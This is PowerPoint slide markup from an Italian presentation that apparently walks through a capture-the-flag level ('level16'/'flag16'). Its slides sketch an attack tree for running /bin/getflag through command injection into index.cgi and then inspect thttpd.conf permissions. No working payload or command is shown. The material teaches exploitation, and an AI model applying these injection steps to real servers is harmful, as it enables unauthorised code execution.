                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4A499E9-7B32-208B-FCD1-4E78EF055B3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3373013" y="1704224"/>
            <a:ext cx="3013364" cy="50569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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Esecuzione indiretta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>/bin/getflag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t> come utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>flag16</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rettangolo 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69CC5D6D-6426-3B53-5F30-522A093D21D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3023884" y="2646331"/>
            <a:ext cx="1496098" cy="50569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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Login come utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>level16</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rettangolo 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAC40AE4-C488-0A30-AE18-4425D5C3F198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480732" y="2656900"/>
            <a:ext cx="1323012" cy="50569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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Iniezione di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>/bin/getflag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Figura a mano libera: forma 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C256A9B1-7B2C-30E7-2102-927796F49FA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4711806" y="2268774"/>
            <a:ext cx="367145" cy="124707"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 367145"/>
              <a:gd name="connsiteY0" fmla="*/ 6927 h 124707"/>
              <a:gd name="connsiteX1" fmla="*/ 193963 w 367145"/>
              <a:gd name="connsiteY1" fmla="*/ 124691 h 124707"/>
              <a:gd name="connsiteX2" fmla="*/ 367145 w 367145"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 124707"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="367145" h="124707">
                <a:moveTo>
                  <a:pt x="0" y="6927"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="66386" y="66386"/>
                  <a:pt x="132772" y="125845"/>
                  <a:pt x="193963" y="124691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="255154" y="123537"/>
                  <a:pt x="311149" y="61768"/>
                  <a:pt x="367145" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="1905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30" name="CasellaDiTesto 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B769B9BA-007F-31FF-F7D1-12DAA5F2B9D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4639886" y="2394195"/>
            <a:ext cx="479618" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1">
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1">
              <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Rettangolo 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A388DE6-A6B3-272E-1D23-8717834DA5CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248594" y="3401867"/>
            <a:ext cx="1323012" cy="415418"/>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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Iniezione locale</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Connettore diritto 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF731BF2-9580-B89A-1689-3102CA60EB11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="46" idx="2"/>
            <a:endCxn id="28" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6065312" y="3817285"/>
            <a:ext cx="844788" cy="379243"/>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8" name="Rettangolo 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{969920CB-264A-F826-7CDC-B7C723A6212A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4895378" y="4196528"/>
            <a:ext cx="2339868" cy="415418"/>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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Esecuzione locale di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>/home/flag16/index.cgi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D35407AD-0A5E-F13C-3701-4F3AE64A578E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2542309" y="3609576"/>
            <a:ext cx="1563516" cy="83237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152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>L’iniezione locale non ha successo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2875842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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Elemento grafico 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E15493-75C9-202C-A32E-C7DC272E68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55917" y="1266977"/>
            <a:ext cx="2892607" cy="2892607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1840" name="Google Shape;1840;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260120" y="845540"/>
            <a:ext cx="1284600" cy="12846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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234334" y="2352675"/>
            <a:ext cx="3872041" cy="194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9300">
                <a:solidFill>
                  <a:srgbClr val="00CFBE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SOLUZIONE</a:t>
            </a:r>
            <a:endParaRPr sz="9300">
              <a:solidFill>
                <a:srgbClr val="00CFBE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1843" name="Google Shape;1843;p61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283220" y="845540"/>
            <a:ext cx="1261500" cy="1284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02</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2876625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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Elemento grafico 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E15493-75C9-202C-A32E-C7DC272E68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55917" y="1266977"/>
            <a:ext cx="2892607" cy="2892607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1840" name="Google Shape;1840;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260120" y="845540"/>
            <a:ext cx="1284600" cy="12846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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234334" y="2352675"/>
            <a:ext cx="3872041" cy="194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800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INIEZIONE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="9300"/>
              <a:t>REMOTA</a:t>
            </a:r>
            <a:endParaRPr sz="9300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1843" name="Google Shape;1843;p61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283220" y="845540"/>
            <a:ext cx="1261500" cy="1284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02</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1158165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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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INIEZIONE REMOTA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="1075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0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Dobbiamo cambiare strategia… effettivamente sembra esserci un’altra strada!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Oltre al file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" err="1"/>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> esiste anche il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>, analizziamolo.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4035235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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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it-IT"/>
              <a:t>ANALISI DI THTTPD.CONF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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Immagine 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1A22A46-137D-CFAF-58D2-C38A64E41306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2009417" y="1904271"/>
            <a:ext cx="5125165" cy="600159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C63FB44A-C046-D1CF-521B-A5D0596C279E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="2925041"/>
            <a:ext cx="7313596" cy="600159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buClr>
                <a:srgbClr val="F99AAA"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>Modificabile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> solo da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="F99AAA"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>È </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>leggibile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> da tutti gli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" dirty="0"/>
              <a:t>utenti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;4976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A035035A-A6B9-5205-B723-01683799EF81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1536236"/>
            <a:ext cx="7313596" cy="23144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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Visualizziamo i metadati del file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>thttpd.conf</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19471204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
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">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xEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="21"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Google Shape;1840;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260120" y="845540"/>
            <a:ext cx="1284600" cy="12846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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234334" y="2352675"/>
            <a:ext cx="3872041" cy="194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800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DESCRIZIONE DEL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="9300"/>
              <a:t>PROBLEMA</a:t>
            </a:r>
            <a:endParaRPr sz="9300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1843" name="Google Shape;1843;p61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283220" y="845540"/>
            <a:ext cx="1261500" cy="1284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01</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1830" name="Elemento grafico 1829">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C215256-BC73-EBD1-1C25-C4D8CE730C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45727" y="956787"/>
            <a:ext cx="3512988" cy="3512988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25448671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4" name="Rettangolo 3">
            <a:extLst>
